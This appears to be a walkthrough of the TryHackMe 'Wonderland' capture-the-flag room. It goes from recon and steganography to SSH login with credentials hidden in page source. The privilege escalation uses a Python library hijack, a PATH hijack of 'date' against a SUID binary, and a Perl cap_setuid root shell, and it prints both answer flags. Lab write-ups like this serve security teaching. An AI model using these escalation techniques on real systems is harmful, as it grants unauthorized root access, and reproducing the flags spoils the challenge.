TryHackMe-Wonderland

From aldeid
Jump to navigation Jump to search

Wonderland

Fall down the rabbit hole and enter wonderland.

Enter Wonderland and capture the flags.

#1 - Obtain the flag in user.txt

Hint: Everything is upside down here.

Recon

Let’s start with a Nmap scan.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The server is hosting 2 ports, SSH (22) and HTTP (80). There is no robots.txt file to disclose hidden locations. Let’s see what dirsearch is finding.

$ /data/src/dirsearch/dirsearch.py -u http://10.10.125.113/ -E -w /data/src/wordlists/directory-list-2.3-medium.txt 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 220529

Error Log: /data/src/dirsearch/logs/errors-20-06-11_12-54-47.log

Target: http://10.10.125.113/

[12:54:47] Starting: 
[12:54:47] 200 -  402B  - /
[12:54:48] 301 -    0B  - /img  ->  img/
[12:54:49] 301 -    0B  - /r  ->  r/
[12:56:16] 301 -    0B  - /poem  ->  poem/
[12:56:28] 301 -    0B  - /http%3A%2F%2Fwww  ->  /http:/www
[12:58:49] 301 -    0B  - /http%3A%2F%2Fyoutube  ->  /http:/youtube
[12:59:47] 301 -    0B  - /http%3A%2F%2Fblogs  ->  /http:/blogs
[12:59:56] 301 -    0B  - /http%3A%2F%2Fblog  ->  /http:/blog
[13:00:44] 301 -    0B  - /%2A%2Ahttp%3A%2F%2Fwww  ->  /%2A%2Ahttp:/www
[13:08:19] 301 -    0B  - /http%3A%2F%2Fcommunity  ->  /http:/community
[13:09:02] 301 -    0B  - /http%3A%2F%2Fradar  ->  /http:/radar
[13:11:01] 301 -    0B  - /http%3A%2F%2Fjeremiahgrossman  ->  /http:/jeremiahgrossman
[13:11:01] 301 -    0B  - /http%3A%2F%2Fweblog  ->  /http:/weblog
[13:11:06] 301 -    0B  - /http%3A%2F%2Fswik  ->  /http:/swik

We have discovered 3 interesting locations (the rest can be ignored):

  • /img: 3 images are there, we’ll check that later
  • /r: this will be the beginning of our rabbit chasing, we’ll see that just after
  • /poem: this is a poem, and we actually don’t need it.

Main page

Now, let’s see what the home page looks like:

$ curl -s http://10.10.125.113
<!DOCTYPE html>
<head>
    <title>Follow the white rabbit.</title>
    <link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
    <h1>Follow the White Rabbit.</h1>
    <p>"Curiouser and curiouser!" cried Alice (she was so much surprised, that for the moment she quite forgot how to speak good English)</p>
    <img src="/img/white_rabbit_1.jpg" style="height: 50rem;">
</body>

There might be something to get from the image:

$ wget http://10.10.125.113/img/white_rabbit_1.jpg
$ steghide info white_rabbit_1.jpg 
"white_rabbit_1.jpg":
  format: jpeg
  capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "hint.txt":
    size: 22.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
$ steghide extract -sf white_rabbit_1.jpg 
Enter passphrase: 
wrote extracted data to "hint.txt".
$ cat hint.txt 
follow the r a b b i t

Follow the rabbit

Dirsearch found a /r directory, which is the first letter of “rabbit”. Let’s follow the r a b b i t:

$ curl -s http://10.10.125.113/r/a/b/b/i/t/
<!DOCTYPE html>

<head>
    <title>Enter wonderland</title>
    <link rel="stylesheet" type="text/css" href="/main.css">
</head>

<body>
    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    </p>
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
    <img src="/img/alice_door.png" style="height: 50rem;">
</body>$ 

SSH connection

There are credentials in a hidden section of the source code: alice:HowDothTheLittleCrocodileImproveHisShiningTail. Let’s try to connect as alice:

$ ssh [email protected]

[email protected]:~$ pwd
/home/alice
[email protected]:~$ ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 17:52 .
drwxr-xr-x 6 root  root  4096 May 25 17:52 ..
lrwxrwxrwx 1 root  root     9 May 25 17:52 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25 02:36 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 02:36 .bashrc
drwx------ 2 alice alice 4096 May 25 16:37 .cache
drwx------ 3 alice alice 4096 May 25 16:37 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 02:52 .local
-rw-r--r-- 1 alice alice  807 May 25 02:36 .profile
-rw------- 1 root  root    66 May 25 17:08 root.txt
-rw-r--r-- 1 root  root  3577 May 25 02:43 walrus_and_the_carpenter.py

No user flag (usually user.txt) but a root flag (root.txt). Seriously? Remember the hint, everything is upside down. Wouldn’t the user flag be in /root?

[email protected]:~$ ls -l /root/user.txt
-rw-r--r-- 1 root root 32 May 25 16:40 /root/user.txt
[email protected]:~$ cat /root/user.txt
thm{"Curiouser and curiouser!"}

User flag: thm{"Curiouser and curiouser!"}

#2 Escalate your privileges, what is the flag in root.txt?

From alice to rabbit

Checking the /home subdirectories, we discover that there are other users (something to keep in mind as we will likely need to switch from alice to another user):

[email protected]:~$ ls -la /home
total 24
drwxr-xr-x  6 root      root      4096 May 25 17:52 .
drwxr-xr-x 23 root      root      4096 May 25 00:23 ..
drwxr-xr-x  5 alice     alice     4096 May 25 17:52 alice
drwxr-x---  3 hatter    hatter    4096 May 25 22:56 hatter
drwxr-x---  2 rabbit    rabbit    4096 May 25 17:58 rabbit
drwxr-x---  6 tryhackme tryhackme 4096 May 25 22:59 tryhackme

There is a python script in Alice’s home:

[email protected]:~$ cat walrus_and_the_carpenter.py 
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

[REDACTED]

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

The script is parsing a poem, taking 10 lines randomly and displaying them:

[email protected]:~$ python3 walrus_and_the_carpenter.py 
The line was:    Walked on a mile or so,
The line was:    The Carpenter said nothing but
The line was:    "That they could get it clear?"
The line was:    Were walking close at hand;
The line was:    We can begin to feed."
The line was:    Those of the largest size.
The line was:    They said, "it would be grand!"
The line was:    All eager for the treat:
The line was:    And why the sea is boiling hot —
The line was:    "It seems a shame," the Walrus said,

Checking our privileges reveals that we can execute the walrus_and_the_carpenter.py script as rabbit using sudo.:

[email protected]:~$ sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Well, at this stage, the only possibility seems to hijack the import random statement from the python script to import our own library.

Let’s hook the import as follows:

[email protected]:~$ cd /home/alice/
[email protected]:~$ cat > random.py << EOF
import os
os.system("/bin/bash")
EOF
[email protected]:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
[sudo] password for alice: 
[email protected]:~$ whoami
rabbit

From rabbit to hatter

Still no flag, and another challenge to solve:

[email protected]:/home/rabbit$ ll
total 40
drwxr-x--- 2 rabbit rabbit  4096 May 25 17:58 ./
drwxr-xr-x 6 root   root    4096 May 25 17:52 ../
lrwxrwxrwx 1 root   root       9 May 25 17:53 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25 03:01 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25 03:01 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25 03:01 .profile
-rwsr-sr-x 1 root   root   16816 May 25 17:58 teaParty*
[email protected]:/home/rabbit$ file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped
[email protected]:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Thu, 11 Jun 2020 13:29:28 +0000
Ask very nicely, and I will give you some tea while you wait for him
tea
Segmentation fault (core dumped)

Let’s download the file to analyze it locally. You can do that by running a python web server from /home/rabbit (python -m http.server) and by downloading it with wget on your machine (wget http://10.10.125.113:8000/teaParty).

Below is the pseudo c code displayed by Hopper:

void main() {
    setuid(0x3eb);
    setgid(0x3eb);
    puts("Welcome to the tea party!\nThe Mad Hatter will be here soon.");
    system("/bin/echo -n 'Probably by ' && date --date='next hour' -R");
    puts("Ask very nicely, and I will give you some tea while you wait for him");
    getchar();
    puts("Segmentation fault (core dumped)");
    return;
}

As we can see, the executable will display a fake segmentation fault message. It is run as root and has the SUID bit set. It manipulates the date function to echo the current datetime + 1 hour. This is likely something we can exploit by hooking the date function.

[email protected]:/home/rabbit$ cat > date << EOF
#!/bin/bash
/bin/bash
EOF
[email protected]:/home/rabbit$ chmod +x date
[email protected]:/home/rabbit$ export PATH=/home/rabbit:$PATH
[email protected]:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by [email protected]:/home/rabbit$ 
[email protected]:/home/rabbit$ 
[email protected]:/home/rabbit$ whoami
hatter

From hatter to root (privesc)

Now that we have successfully switched to the hatter user, let’s check what we have in our home directory:

[email protected]:/home/rabbit$ cd /home/hatter/
[email protected]:/home/hatter$ cat password.txt 
WhyIsARavenLikeAWritingDesk?

This is our password. We can check our privileges, but we have none, actually:

[email protected]:/home/hatter$ sudo -l
[sudo] password for hatter: 
Sorry, user hatter may not run sudo on wonderland.

Also checked crontab, but we have none, checked the files owned by hatter, nothing we can exploit. Let’s upload linpeas. Make sure you run all tests (linpeas.sh -a).

The interesting stuff is about Perl:

[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Go to https://gtfobins.github.io/gtfobins/perl/ to check the capabilities section of Perl. Let’s get root access:

[email protected]:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
[email protected]:~# whoami
root
[email protected]:~# cat /home/alice/root.txt 
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}

Root flag: thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}